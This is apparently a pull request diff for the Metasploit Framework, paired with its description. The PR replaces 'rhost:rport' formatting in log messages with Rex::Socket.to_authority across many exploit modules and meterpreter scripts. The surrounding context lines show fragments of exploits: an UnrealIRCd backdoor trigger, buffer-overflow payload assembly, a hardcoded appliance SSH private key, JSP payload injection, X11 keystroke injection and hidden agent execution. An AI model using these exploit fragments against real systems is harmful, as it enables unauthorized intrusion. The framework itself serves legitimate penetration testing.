@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     vprint_status("Connecting to IRC service")
     connect
-    print_status("Connected to #{rhost}:#{rport}")
+    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")
 
     vprint_status("Checking IRC banner")
     return Exploit::CheckCode::Appears('UnrealIRCd detected in banner') if unreal_version?(send_irc_command)
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Connect to the IRC service
     vprint_status("Connecting to IRC service")
     connect
-    print_status("Connected to #{rhost}:#{rport}")
+    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")
 
     print_status("Sending IRC backdoor command")
     sock.put("AB;" + payload.encoded + "\n")

--- a/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb
+++ b/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb
@@ -166,10 +166,10 @@ class MetasploitModule < Msf::Exploit::Remote
     cur_threads.each { |sock| sock.kill }
 
     if !results.empty?
-      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Successfully exploited the authentication bypass flaw")
       do_payload(results[0])
     else
-      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Unable to bypass authentication, this target may not be vulnerable")
     end
   end
 

--- a/modules/exploits/unix/misc/xerox_mfp.rb
+++ b/modules/exploits/unix/misc/xerox_mfp.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Sending print job...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending print job...")
     firmcode = '%%XRXbegin' + "\x0A"
     firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
     firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.put(firmcode)
       handler
     rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
-      print_error("#{rhost}:#{rport} - #{e.message}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{e.message}")
     ensure
       disconnect
     end

--- a/modules/exploits/unix/smtp/exim4_string_format.rb
+++ b/modules/exploits/unix/smtp/exim4_string_format.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ehlo = datastore['EHLO_NAME']
     ehlo ||= Rex::Text.rand_text_alphanumeric(8) + ".com"
 
-    print_status("Connecting to #{rhost}:#{rport} ...")
+    print_status("Connecting to #{Rex::Socket.to_authority(rhost, rport)} ...")
     connect
 
     print_status("Server: #{self.banner.to_s.strip}")

--- a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
+++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
       return result, 0
     rescue ::Exception => e
-      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Error smtp_send: '#{e.class}' '#{e}'")
       return nil, 0
     end
   end

--- a/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
+++ b/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res && res.body.include?("success")
-      print_error("Error sending XML to #{rhost}:#{rport}")
+      print_error("Error sending XML to #{Rex::Socket.to_authority(rhost, rport)}")
     end
   end
 

--- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb
+++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
-    print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login to the Arista's restricted shell...")
 
     begin
       ssh = nil

--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login_key(user)
-    print_status("#{rhost}:#{rport} - Attempt to login with '#{user}:SSH PRIVATE KEY'")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login with '#{user}:SSH PRIVATE KEY'")
 
     key_data = "-----BEGIN DSA PRIVATE KEY-----\n"
     key_data += "MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm\n"
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login_user_pass(user, pass)
-    print_status("#{rhost}:#{rport} - Attempting to login with '#{user}:#{pass}'")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to login with '#{user}:#{pass}'")
     factory = ssh_socket_factory
     opts = {
       auth_methods: ['password', 'keyboard-interactive'],
@@ -180,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
 
     if datastore['SSHKEY']
-      print_good("#{rhost}:#{rport} - Login Successful (#{user}:SSH PRIVATE KEY)")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:SSH PRIVATE KEY)")
     else
-      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
     end
 
     # Make the SSH connection and execute our commands + payload
-    print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending and executing payload to gain root privileges!")
     Net::SSH::CommandStream.new(ssh, build_command, logger: self)
   end
 end

--- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
+++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
     banner = sock.get_once.to_s.strip
-    vprint_status("#{rhost}:#{rport} - Banner: #{banner}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Banner: #{banner}")
     disconnect
 
     # Vulnerable version info obtained from CVE
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Type 51 means the server is trying to tell us what auth methods are allowed.
     if message.type == 51 and message.to_s !~ /password/
-      print_error("#{rhost}:#{rport} - This host does not use password method authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - This host does not use password method authentication")
       return false
     end
 
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
   #
   def userauth_passwd_change(user, transport, connection)
-    print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending USERAUTH Change request...")
     pkt = Net::SSH::Buffer.from(
       :byte, 0x32,               # userauth request
       :string, user,             # username
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     transport.send_message(pkt)
     message = transport.next_message.type
-    print_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Auths that can continue: #{message.inspect}")
 
     if message.to_i == 52 # SSH2_MSG_USERAUTH_SUCCESS
       transport.send_message(transport.service_request("ssh-userauth"))
@@ -223,13 +223,13 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     end
 

--- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb
+++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb
@@ -198,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if alert.nil?
       print_error('At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...')
     end
-    print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}")
+    print_status("Sending request to http://#{Rex::Socket.to_authority(rhost, rport)}#{target_uri.path}")
 
     # Generate a payload ELF to execute
     elfbin = generate_payload_exe

--- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb
+++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     uri = normalize_uri(datastore['URI'])
-    print_status("Sending request to http://#{rhost}:#{rport}#{uri}")
+    print_status("Sending request to http://#{Rex::Socket.to_authority(rhost, rport)}#{uri}")
 
     res = send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
+++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
@@ -102,8 +102,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/
       session = $1
-      print_good("#{rhost}:#{rport} - Login Successful")
-      print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Session cookie is [ #{session} ]")
       return session
     else
       fail_with(Failure::Unknown, "#{peer} - Login was not succesful!")

--- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
+++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return nil
     end
 
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       }, timeout)
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return nil
     end
 

--- a/modules/exploits/unix/x11/x11_keyboard_exec.rb
+++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb
@@ -259,7 +259,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rhost}:#{rport} - Register keyboard")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Register keyboard")
 
     req = "\x6c" # Byte order (Little-Endian)
     req << "\x00" # Unused
@@ -441,39 +441,39 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Press ALT+F2 to start up "Run application"
-    print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening \"Run Application\"")
     press_key(KB_KEYS['alt'])
     press_key(KB_KEYS['f2'])
     release_key(KB_KEYS['alt'])
     release_key(KB_KEYS['f2'])
 
     # Wait X seconds to open the dialog
-    print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{datastore['TIME_WAIT']} seconds...")
     Rex.sleep(datastore['TIME_WAIT'])
 
     if datastore['TARGET'] == 0
       # Start a xterm terminal
-      print_status("#{rhost}:#{rport} - Opening xterm")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening xterm")
       type_command('xterm')
     else
       # Start a Gnome terminal
-      print_status("#{rhost}:#{rport} - Opening gnome-terminal")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening gnome-terminal")
       type_command('gnome-terminal')
     end
 
-    print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{datastore['TIME_WAIT']} seconds...")
     # Wait X seconds to open the terminal
     Rex.sleep(datastore['TIME_WAIT'])
 
     # "Type" our payload and execute it
-    print_status("#{rhost}:#{rport} - Typing and executing payload")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Typing and executing payload")
     command = "nohup #{payload.encoded} &2>/dev/null; sleep 1; exit"
 
     type_command(command)
 
     handler
   rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
-    print_error("#{rhost}:#{rport} - #{e.message}")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{e.message}")
   ensure
     disconnect
   end

--- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb
+++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << make_nops(20)
     buf << payload.encoded
 
-    print_status("#{rhost}:#{rport} - Sending #{self.name}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending #{self.name}")
     connect
     send_user(buf)
     handler

--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     fingerprint = fingerprint_mod_wl
-    print_status "#{rhost}:#{rport} - #{fingerprint}"
+    print_status "#{Rex::Socket.to_authority(rhost, rport)} - #{fingerprint}"
 
     case fingerprint
     when /Version found/

--- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb
+++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
     bof << rand_text(target['CrashLength'])
 
-    print_status("Sending request to #{rhost}:#{rport}")
+    print_status("Sending request to #{Rex::Socket.to_authority(rhost, rport)}")
 
     send_request_cgi({
       'uri' => "/",

--- a/modules/exploits/windows/http/netdecision_http_bof.rb
+++ b/modules/exploits/windows/http/netdecision_http_bof.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << payload.encoded
     buf << rand_text_alpha(8000 - buf.length, payload_badchars)
 
-    print_status("#{rhost}:#{rport} - Sending #{self.name}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending #{self.name}...")
 
     send_request_raw({
       'method' => 'GET',

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Exploiting remote system")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting remote system")
     uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
     execute_cmdstager({ :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Exploit
       end
 
       if res.code != 200
-        vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Output: #{res.body}")
         fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Exploit failed")
       end
     rescue ::Rex::ConnectionError
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit
     end
 
     if not res.body.include?("Process created")
-      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Output: #{res.body}")
       fail_with(Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed")
     end
     return res

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -96,9 +96,9 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       jsp = @outpath.gsub(/\//, "\\\\")
       jsp = jsp.gsub(/"/, "")
-      print_warning("#{rhost}:#{rport} - Deleting: #{jsp}")
+      print_warning("#{Rex::Socket.to_authority(rhost, rport)} - Deleting: #{jsp}")
       cli.fs.file.rm(jsp)
-      print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{@jsp_name + '.jsp'} deleted")
     rescue ::Exception => e
       print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
     end
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
     select(nil, nil, nil, 1)
 
     # Inject our JSP payload
-    print_status("#{rhost}:#{rport} - Sending JSP payload")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending JSP payload")
     pass = rand_text_alpha(rand(10) + 5)
     hex_jsp = generate_jsp_payload
 
@@ -192,7 +192,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Trigger the JSP
-    print_status("#{rhost}:#{rport} - Trigger JSP payload")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trigger JSP payload")
     send_request_cgi({
       'method' => 'POST',
       'uri' => '/LoginServlet',

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -150,7 +150,7 @@ Processor-Speed=#{processor_speed}
       return Exploit::CheckCode::Safe("Altiris DS version #{version} is not vulnerable")
     end
 
-    vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
+    vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Altiris DS Version '#{version}'"
 
     minor = $1.to_i
     build = $2.to_i

--- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb
+++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     request << payload.encoded # The shellcode will be stored in the heap
 
-    print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to exploit #{target.name}...")
     udp_sock.put(request)
     disconnect_udp
   end

--- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb
+++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
     message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length
     message << get_payload
 
-    print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to exploit #{target.name}...")
     udp_sock.put(message)
 
     disconnect_udp

--- a/modules/exploits/windows/misc/fb_cnct_group.rb
+++ b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -254,7 +254,7 @@ class MetasploitModule < Msf::Exploit::Remote
     evil_data << final_rop_chain
     evil_data << payload.encoded
 
-    print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending Connection Request For #{filename}")
     sock.put(evil_data)
 
     disconnect

--- a/modules/exploits/windows/misc/lianja_db_net.rb
+++ b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put("db_net")
     sock.recv(4)
 
-    print_status("#{rhost}:#{rport} - Sending Malicious Data")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending Malicious Data")
     evil_data = '000052E1'
     evil_data << 'A'
     evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur

--- a/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
+++ b/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect
-    print_status("Connected to #{rhost}:#{rport}") if datastore['VERBOSE']
+    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}") if datastore['VERBOSE']
 
     cmd_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
     payload_xml = generate_xml(cmd_payload)

--- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb
+++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put("\xF9\x00")
     select(nil, nil, nil, 0.15)
 
-    print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
+    print_status("Sending EXE payload '#{exe}' to #{Rex::Socket.to_authority(rhost, rport)}...")
     sock.put("\xF8" + [data.length].pack('n') + data)
     select(nil, nil, nil, 5)
 

--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("-------------------------------------------------")
 
     # Check if credentials are correct
-    print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")
+    print_status("Attempting to connect to SQL Server at #{Rex::Socket.to_authority(rhost, rport)}...")
 
     if !mssql_login_datastore
       print_error("Invalid SQL Server credentials")

--- a/modules/exploits/windows/postgres/postgres_payload.rb
+++ b/modules/exploits/windows/postgres/postgres_payload.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def do_login(user = nil, pass = nil, database = nil)
     begin
       password = pass || postgres_password
-      vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") unless self.postgres_conn
+      vprint_status("Trying #{user}:#{password}@#{Rex::Socket.to_authority(rhost, rport)}/#{database}") unless self.postgres_conn
       result = postgres_fingerprint(
         :db => database,
         :username => user,

--- a/modules/exploits/windows/ssh/sysax_ssh_username.rb
+++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     pass = rand_text_alpha(8)
     begin
-      print_status("Sending malicious request to #{rhost}:#{rport}...")
+      print_status("Sending malicious request to #{Rex::Socket.to_authority(rhost, rport)}...")
       factory = ssh_socket_factory
       ssh = Net::SSH.start(
         datastore['RHOST'],
@@ -209,11 +209,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
       ::Timeout.timeout(1) { ssh.close }
     rescue Errno::ECONNREFUSED
-      print_error("Cannot establish a connection on #{rhost}:#{rport}")
+      print_error("Cannot establish a connection on #{Rex::Socket.to_authority(rhost, rport)}")
       return
     rescue StandardError => e
       if e.message.match?(/fingerprint [0-9a-z:]+ does not match/)
-        print_error("Please remove #{rhost}:#{rport} from your known_hosts list")
+        print_error("Please remove #{Rex::Socket.to_authority(rhost, rport)} from your known_hosts list")
         return
       end
     end

--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -108,7 +108,7 @@ if client.platform == 'windows'
     #
     # Execute the agent
     #
-    print_status("Executing the agent with endpoint #{rhost}:#{rport}...")
+    print_status("Executing the agent with endpoint #{Rex::Socket.to_authority(rhost, rport)}...")
     pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
   elsif ! spawn
     # Get the target process name

--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -171,7 +171,7 @@ else
   #
   # Execute the agent
   #
-  print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
+  print_status("Executing the VNC agent with endpoint #{Rex::Socket.to_authority(rhost, rport)}...")
   pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
 end
 


### PR DESCRIPTION
On a [recent MR](https://github.com/rapid7/metasploit-framework/pull/20979?email_source=notifications&email_token=AAEC3BQWJRK4P3DEBOBGIUT4TLC2DA5CNFSNUABKM5UWIORPF5TWS5BNNB2WEL2QOVWGYUTFOF2WK43UKJSXM2LFO4XTIMBTGI4DCMZSG422M4TFMFZW63VGMF2XI2DPOKSWK5TFNZ2L24DSL5ZGK5TJMV3V63TPORUWM2LDMF2GS33OONPWG3DJMNVQ#pullrequestreview-4032813275), @smcintyre-r7 suggested that `#{rhost}:#{rport}` became `#{Rex::Socket.to_authority(rhost, rport)}`.

This does that, but at scale....
...but I only did it when `print_` was at play, but there are 361 other instances:

```console
$ grep -R '#{rhost}:#{rport}' | wc -l
    1649
$ grep -Rl '#{rhost}:#{rport}' | wc -l
     406
$
$
$
$ grep -R 'print_.*#{rhost}:#{rport}' | wc -l
    1288
$ grep -Rl 'print_.*#{rhost}:#{rport}' | wc -l
     306
$
```